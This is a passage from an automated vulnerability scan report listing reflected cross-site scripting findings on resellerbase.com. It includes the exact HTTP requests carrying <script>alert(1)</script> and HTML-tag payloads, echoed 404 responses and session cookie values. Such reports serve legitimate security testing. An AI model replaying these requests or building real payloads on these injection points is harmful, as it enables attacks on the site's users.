<p>The requested URL /detail/30/themes/search.php?keyword=search...&Submit3=Search&opt=263c52<a>cc796d03327 was not found on this server.</p>
...[SNIP]...

2.2167. http://www.resellerbase.com/detail/31/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/31/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a1966<script>alert(1)</script>108172b458 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaila1966<script>alert(1)</script>108172b458/31/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaila1966<script>alert(1)</script>108172b458/31/ was not found on this server.</p>
...[SNIP]...

2.2168. http://www.resellerbase.com/detail/31/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/31/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e417e<script>alert(1)</script>412b6fe4ff5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31e417e<script>alert(1)</script>412b6fe4ff5/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

2.2169. http://www.resellerbase.com/detail/31/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/31/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7fe7e<script>alert(1)</script>a49ef4f900c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31/?7fe7e<script>alert(1)</script>a49ef4f900c=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

2.2170. http://www.resellerbase.com/detail/31/camsense-com.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/31/camsense-com.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 233cd<script>alert(1)</script>dfc9ffae8d4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail233cd<script>alert(1)</script>dfc9ffae8d4/31/camsense-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:25:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail233cd<script>alert(1)</script>dfc9ffae8d4/31/camsense-com.html was not found on this server.</p>
...[SNIP]...

2.2171. http://www.resellerbase.com/detail/31/camsense-com.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/31/camsense-com.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1f98e<a>46620d77fab was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/311f98e<a>46620d77fab/camsense-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:25:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/311f98e<a>46620d77fab/camsense-com.html was not found on this server.</p>
...[SNIP]...

2.2172. http://www.resellerbase.com/detail/31/camsense-com.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/31/camsense-com.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5d824<script>alert(1)</script>ee2b244ca03 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31/5d824<script>alert(1)</script>ee2b244ca03 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/5d824<script>alert(1)</script>ee2b244ca03 was not found on this server.</p>
...[SNIP]...

2.2173. http://www.resellerbase.com/detail/31/rating.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/31/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 65995<script>alert(1)</script>033e75096e9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail65995<script>alert(1)</script>033e75096e9/31/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:31:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail65995<script>alert(1)</script>033e75096e9/31/rating.php was not found on this server.</p>
...[SNIP]...

2.2174. http://www.resellerbase.com/detail/31/rating.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/31/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 924c5<script>alert(1)</script>6681eada03bda9c3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail924c5<script>alert(1)</script>6681eada03bda9c3/31/rating.php?id=31&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/camsense-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail924c5<script>alert(1)</script>6681eada03bda9c3/31/rating.php?id=31&rating=5 was not found on this server.</p>
...[SNIP]...

2.2175. http://www.resellerbase.com/detail/31/rating.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/31/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bd8c3<script>alert(1)</script>ab2080065b4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31bd8c3<script>alert(1)</script>ab2080065b4/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:31:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31bd8c3<script>alert(1)</script>ab2080065b4/rating.php was not found on this server.</p>
...[SNIP]...

2.2176. http://www.resellerbase.com/detail/31/rating.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/31/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d9165<script>alert(1)</script>2d7ded7a498646a75 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/31d9165<script>alert(1)</script>2d7ded7a498646a75/rating.php?id=31&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/camsense-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31d9165<script>alert(1)</script>2d7ded7a498646a75/rating.php?id=31&rating=5 was not found on this server.</p>
...[SNIP]...

2.2177. http://www.resellerbase.com/detail/31/rating.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/31/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 58f87<script>alert(1)</script>558bbb7919b4368e1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/31/rating.php58f87<script>alert(1)</script>558bbb7919b4368e1?id=31&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/camsense-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/rating.php58f87<script>alert(1)</script>558bbb7919b4368e1?id=31&rating=5 was not found on this server.</p>
...[SNIP]...

2.2178. http://www.resellerbase.com/detail/31/rating.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/31/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 15ed0<script>alert(1)</script>bcd96f4c828 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31/rating.php15ed0<script>alert(1)</script>bcd96f4c828 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:31:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/rating.php15ed0<script>alert(1)</script>bcd96f4c828 was not found on this server.</p>
...[SNIP]...

2.2179. http://www.resellerbase.com/detail/31/rating.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/31/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload aa0b3<script>alert(1)</script>257443ef979331452 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/31/rating.php/aa0b3<script>alert(1)</script>257443ef979331452?id=31&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/camsense-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/rating.php/aa0b3<script>alert(1)</script>257443ef979331452?id=31&rating=5 was not found on this server.</p>
...[SNIP]...

2.2180. http://www.resellerbase.com/detail/31/rating.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/31/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 856dc<script>alert(1)</script>84ac193d44 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31/rating.php?856dc<script>alert(1)</script>84ac193d44=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:30:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/rating.php?856dc<script>alert(1)</script>84ac193d44=1 was not found on this server.</p>
...[SNIP]...

2.2181. http://www.resellerbase.com/detail/31/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/31/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 24891<script>alert(1)</script>43290dbb187 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail24891<script>alert(1)</script>43290dbb187/31/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/camsense-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail24891<script>alert(1)</script>43290dbb187/31/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2182. http://www.resellerbase.com/detail/31/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/31/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b2e19<script>alert(1)</script>d86377aa520 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31b2e19<script>alert(1)</script>d86377aa520/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/camsense-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31b2e19<script>alert(1)</script>d86377aa520/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2183. http://www.resellerbase.com/detail/31/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/31/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 11476<script>alert(1)</script>9ff5671b881 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31/search.php11476<script>alert(1)</script>9ff5671b881?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/camsense-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/search.php11476<script>alert(1)</script>9ff5671b881?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2184. http://www.resellerbase.com/detail/31/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/31/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 60912<a>bdcb50a5a28 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/31/search.php?keyword=search...&Submit3=Search60912<a>bdcb50a5a28&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/camsense-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/search.php?keyword=search...&Submit3=Search60912<a>bdcb50a5a28&opt=2 was not found on this server.</p>
...[SNIP]...

2.2185. http://www.resellerbase.com/detail/31/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/31/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload e4b90<a>624a52d73ee was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/31/search.php?keyword=search...e4b90<a>624a52d73ee&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/camsense-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/search.php?keyword=search...e4b90<a>624a52d73ee&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2186. http://www.resellerbase.com/detail/31/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/31/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 2720c<script>alert(1)</script>28d79c7c6f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31/search.php?keyword=search...&Submit3=Search&opt=2&2720c<script>alert(1)</script>28d79c7c6f9=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/camsense-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/search.php?keyword=search...&Submit3=Search&opt=2&2720c<script>alert(1)</script>28d79c7c6f9=1 was not found on this server.</p>
...[SNIP]...

2.2187. http://www.resellerbase.com/detail/31/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/31/search.php

Issue detail

